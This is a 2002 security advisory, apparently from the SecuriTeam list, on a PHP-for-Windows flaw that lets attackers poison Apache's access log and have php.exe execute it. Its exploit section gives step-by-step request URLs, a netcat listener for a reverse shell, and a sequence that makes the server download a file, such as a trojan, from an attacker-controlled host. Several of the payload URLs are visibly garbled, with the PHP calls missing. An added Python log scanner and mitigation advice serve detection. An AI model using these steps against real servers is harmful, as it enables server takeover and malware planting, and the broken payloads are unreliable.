[NT] Gaining Root Access via PHP.exe

From: support@securiteam.com
Date: 01/23/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 23 Jan 2002 13:36:39 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Gaining Root Access via PHP.exe
------------------------------------------------------------------------

SUMMARY

A major security vulnerability has been found in PHP for Windows. Because
php.exe can be made to read and execute files that reside outside the
normal HTML root directory, an attacker can insert a malicious PHP command
into the Apache log file and then have php.exe execute it, which gives
arbitrary code execution on the server.

DETAILS

Vulnerable systems:
PHP version 4.0 with Apache Server version 2.0

Exploit (Executing a command):
Assume that Apache has been installed in "c:\apache" and that php.exe was
installed in its default path of "c:\php\php.exe". The exploit steps to
gain root are as follows:
 
In the browser, you type the following:
 
1) http://www.example.com/('thecommandtoexecutewithpath');%20?>
 
Apache will then add this request line to the access.log file. By
requesting the log file through php.exe you can then have PHP run the
system code, like this:
 
2)
http://www.example.com/php/php.exe?c:\apache\logs\access.log
 
This will run the php code mentioned above.
 
Root is gained by getting the web server to open a reverse telnet
connection back to your own server, which is running netcat with a command
such as:
 
"nc -l -n -v -p "
 
As you can see, this is a very simple way to compromise the entire server
with the php.exe exploit.

Exploit (Uploading a file):
1) Create a text file on your web server called mytestfile.txt
2) Write a short line of text in it.
3) Check how big the file is (in bytes).
4) Test that the file can be accessed via your browser by typing
http://[YOUR_SERVER_IP]/mytestfile.txt
5) Check that the file exists on the server by typing
http://www.example.com/mytestfile.txt into your browser.
6) You now have to make 4 requests (if the browser does not seem to
connect, do not worry, it is; do not press refresh in any step, otherwise
this will not work; remember to replace the bracketed values on the first
two lines).

7) Make the request in your browser
http://www.example.com/("http://[YOUR_SERVER_IP]/mytestfile.txt"," rb");?>

8) Wait for about 10 Seconds
9) Make the request in your browser
http://www.example.com/,[REPLACE_WITH_THE_SIZE_OF_YOUR_FILE]);?>

10) Wait for about 10 Seconds
11) Make the request in your browser
http://www.example.com/("c:/Apache2/htdocs/mytestfile.txt","wb");?>

12) Wait for about 10 Seconds
13) Make the request in your browser
http://www.example.com/);?>

14) Wait for about 10 Seconds
15) Make a request for a non-existent file (To flush the access log) by
typing
http://www.example.com/nonexistantfile.htm
16) Wait for about 10 seconds

17) Get php.exe to parse the apache logfile by typing
http://www.example.com/php/php.exe?c:\apache2\logs\access.log

18) Press Refresh to make sure the log file has been parsed.
19) Check for the file on server by typing in your browser
http://www.example.com/mytestfile.txt

What happens is that php.exe runs the php code that has been logged in the
apache log file. The code in the apache log file then tells the server to
download the file from your server and save it into the apache directory.

The file uploaded can be a Trojan, exe file, php file, etc. There is no
limitation to what and where you can upload.

It is a very simple task to write a Trojan with CGI headers and to execute
it once uploaded.
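Both exploit variants above leave the same two traces in the Apache access log: a request line that carries PHP tags (Apache writes the request line verbatim, which is the whole point of the poisoning step) and a request that hands php.exe a filesystem path such as the access log itself. The following Python script, added here as an example and not part of the SecuriTeam advisory or Paul Brereton's write-up, scans common-log-format lines for those two patterns. The log lines, hosts and finding names are constructed for illustration, and the PHP in the sample URIs is a harmless echo rather than the command the advisory describes.

```python
"""Detect the two request patterns behind the php.exe log-poisoning
attack in Apache access-log lines (added example; not from the advisory).

  1. A request whose URI carries an opening PHP tag.  Apache writes the
     request line verbatim into access.log, so the tag ends up in the log.
  2. A request that hands /php/php.exe a filesystem path, such as the
     access log itself, as its argument.

The log lines below are constructed; the PHP in them is a harmless echo.
"""
import re
from urllib.parse import unquote

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)')

# <?php, <?= or <? followed by whitespace: an opening PHP tag in the URI.
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=|\s)', re.IGNORECASE)

# php.exe addressed directly as a URL (with a query, path-info, or bare).
PHP_EXE_RE = re.compile(r'/php\.exe(?:\?|/|$)', re.IGNORECASE)

# A Windows drive-letter path (c:\ or c:/) or a parent-directory hop.
# The lookbehind keeps "http://" from matching as a drive letter.
FS_PATH_RE = re.compile(r'(?<![a-z])[a-z]:[\\/]|\.\.[\\/]', re.IGNORECASE)


def parse_request(line):
    """Split one common-log-format line; None if it is not one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, when, request, status, _size = m.groups()
    parts = request.split(" ")
    if len(parts) < 2:
        return None
    return {"host": host, "time": when, "method": parts[0],
            "target": parts[1], "status": int(status)}


def classify(line):
    """Return the list of findings for a log line ([] if clean,
    None if the line could not be parsed)."""
    rec = parse_request(line)
    if rec is None:
        return None
    raw = rec["target"]
    # Apache logs the request line as received, so a client that sent
    # %3C%3Fphp leaves the tag percent-encoded in the log.  Check both
    # the raw and the decoded form.
    decoded = unquote(raw)
    findings = []
    if PHP_TAG_RE.search(raw) or PHP_TAG_RE.search(decoded):
        findings.append("php-tag-in-uri")
    if PHP_EXE_RE.search(decoded):
        query = decoded.partition("?")[2]
        if FS_PATH_RE.search(query):
            findings.append("php.exe-given-filesystem-path")
        else:
            findings.append("php.exe-requested-directly")
    return findings


def scan(lines):
    """Return (host, target, findings) for every line with a finding."""
    hits = []
    for line in lines:
        findings = classify(line)
        if findings:
            rec = parse_request(line)
            hits.append((rec["host"], rec["target"], findings))
    return hits


# Constructed sample log (not real traffic).  Note that the poisoning
# request does not need to succeed: a 404 is still written to the log.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jan/2002:13:36:39 +0100] "GET /index.html HTTP/1.0" 200 1043',
    # PHP tag sent literally, spaces as %20 (as in the advisory's request)
    '10.0.0.9 - - [23/Jan/2002:13:37:02 +0100] "GET /<?php%20echo%201;%20?> HTTP/1.0" 404 289',
    # Same idea with the tag itself percent-encoded
    '10.0.0.9 - - [23/Jan/2002:13:37:15 +0100] "GET /%3C%3Fphp%20echo%201%3B%20%3F%3E HTTP/1.0" 404 289',
    # php.exe told to parse the access log
    '10.0.0.9 - - [23/Jan/2002:13:38:40 +0100] "GET /php/php.exe?c:\\apache\\logs\\access.log HTTP/1.0" 200 5120',
    # php.exe reached with no argument
    '10.0.0.9 - - [23/Jan/2002:13:39:01 +0100] "GET /php/php.exe HTTP/1.0" 200 17',
]

if __name__ == "__main__":
    for host, target, findings in scan(SAMPLE_LOG):
        print(host, target, ", ".join(findings))
```

On a real log, feed `scan()` the file's lines; any `php.exe-given-filesystem-path` hit is the second half of the attack and worth correlating with earlier `php-tag-in-uri` hits from the same host. Detection is only a stopgap, though: the root cause is that the CGI binary is reachable by URL and executes whatever file path it is handed, so php.exe should not live under a URL-mapped directory, and PHP's CGI build offers `--enable-force-cgi-redirect` (the `cgi.force_redirect` php.ini directive in later releases) to refuse direct invocation and the `doc_root` directive to confine which files it will execute.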

ADDITIONAL INFORMATION

The information has been provided by
<mailto:brereton_paul@btopenworld.com> Paul Brereton.
